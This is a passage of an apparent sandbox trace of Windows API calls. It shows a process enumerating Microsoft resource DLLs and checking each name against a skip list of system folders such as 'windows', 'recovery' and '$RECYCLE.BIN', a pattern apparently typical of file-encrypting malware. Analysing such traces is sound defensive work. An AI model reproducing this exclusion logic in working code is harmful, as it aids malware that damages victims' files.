[0125.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0125.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0125.810] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2fa0ca2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2fa0ca2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2fed144, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e60, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.DataWarehouse.Interfaces.resources.dll", cAlternateFileName="MIE9BA~1.DLL")) returned 1 [0125.810] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2=".") returned 1 [0125.810] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="..") returned 1 [0125.810] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="...") returned 1 [0125.810] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="windows") returned -1 [0125.810] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="recovery") returned -1 [0125.810] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="perflogs") returned -1 [0125.810] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="documents and settings") returned 1 [0125.810] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.810] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="system volume information") returned -1 [0125.810] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="msocache") returned -1 [0125.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0125.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0125.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0125.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x20d920, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.Interfaces.resources.dll", lpUsedDefaultChar=0x0) returned 48 [0125.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0125.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0125.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0125.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x20dde8, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.Interfaces.resources.dll", lpUsedDefaultChar=0x0) returned 48 [0125.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0125.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23dee0 [0125.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0125.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0125.811] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45f9db0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf45f9db0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf45f9db0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4d050, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.DataWarehouse.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0125.811] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2=".") returned 1 [0125.811] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="..") returned 1 [0125.811] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="...") returned 1 [0125.811] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="windows") returned -1 [0125.811] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="recovery") returned -1 [0125.811] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="perflogs") returned -1 [0125.811] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="documents and settings") returned 1 [0125.811] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.811] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="system volume information") returned -1 [0125.811] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="msocache") returned -1 [0125.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0125.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0125.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.resources.dll", lpUsedDefaultChar=0x0) returned 37 [0125.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0125.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c010 [0125.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0125.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0125.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x22d0d8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.resources.dll", lpUsedDefaultChar=0x0) returned 37 [0125.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c010 | out: hHeap=0x1e0000) returned 1 [0125.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2475b0 [0125.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0125.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0125.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.811] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45d3b76, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf45d3b76, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf45f9db0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4b040, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0125.811] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2=".") returned 1 [0125.811] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="..") returned 1 [0125.812] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="...") returned 1 [0125.812] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="windows") returned -1 [0125.812] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="recovery") returned -1 [0125.812] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="perflogs") returned -1 [0125.812] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="documents and settings") returned 1 [0125.812] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.812] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="system volume information") returned -1 [0125.812] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="msocache") returned -1 [0125.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0125.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0125.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x20dba8, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpUsedDefaultChar=0x0) returned 52 [0125.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0125.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0125.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0125.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x20dde8, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpUsedDefaultChar=0x0) returned 52 [0125.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0125.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e110 [0125.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0125.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0125.812] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6aee686, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6aee686, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6aee686, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x9040, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.DataExtensions.resources.dll", cAlternateFileName="MI1341~1.DLL")) returned 1 [0125.812] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2=".") returned 1 [0125.812] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="..") returned 1 [0125.812] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="...") returned 1 [0125.812] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="windows") returned -1 [0125.812] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="recovery") returned -1 [0125.812] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="perflogs") returned -1 [0125.812] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="documents and settings") returned 1 [0125.812] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.812] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="system volume information") returned -1 [0125.812] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="msocache") returned -1 [0125.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0125.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0125.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x20dde8, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.DataExtensions.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0125.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0125.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0125.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0125.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0125.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d698, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.DataExtensions.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0125.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0125.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f280 [0125.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0125.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0125.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.813] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x56f7a52, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56f7a52, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x56f7a52, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x19040, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.Diagnostics.resources.dll", cAlternateFileName="MI2EA0~1.DLL")) returned 1 [0125.813] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2=".") returned 1 [0125.813] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="..") returned 1 [0125.813] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="...") returned 1 [0125.813] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="windows") returned -1 [0125.813] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0125.813] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0125.813] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0125.813] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.813] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0125.813] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0125.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0125.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0125.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x20dba8, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 53 [0125.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0125.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0125.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0125.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x20dde8, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 53 [0125.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0125.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e8b8 [0125.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0125.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0125.814] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf99462e6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf99462e6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9992797, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1baa8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cAlternateFileName="MIC811~1.DLL")) returned 1 [0125.814] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2=".") returned 1 [0125.814] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="..") returned 1 [0125.814] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="...") returned 1 [0125.814] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="windows") returned -1 [0125.814] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="recovery") returned -1 [0125.814] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="perflogs") returned -1 [0125.814] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="documents and settings") returned 1 [0125.814] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.814] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="system volume information") returned -1 [0125.814] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="msocache") returned -1 [0125.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0125.814] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0125.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0125.814] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x20d698, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpUsedDefaultChar=0x0) returned 63 [0125.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0125.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0125.814] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0125.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0125.814] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x20d920, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpUsedDefaultChar=0x0) returned 63 [0125.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0125.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x245200 [0125.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0125.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0125.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0125.814] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa853100, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa853100, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa853100, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x75040, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.QueryDesigners.resources.dll", cAlternateFileName="MI63FB~1.DLL")) returned 1 [0125.814] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2=".") returned 1 [0125.814] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="..") returned 1 [0125.814] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="...") returned 1 [0125.814] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="windows") returned -1 [0125.814] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="recovery") returned -1 [0125.814] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="perflogs") returned -1 [0125.815] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="documents and settings") returned 1 [0125.815] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.815] lstrcmpiW 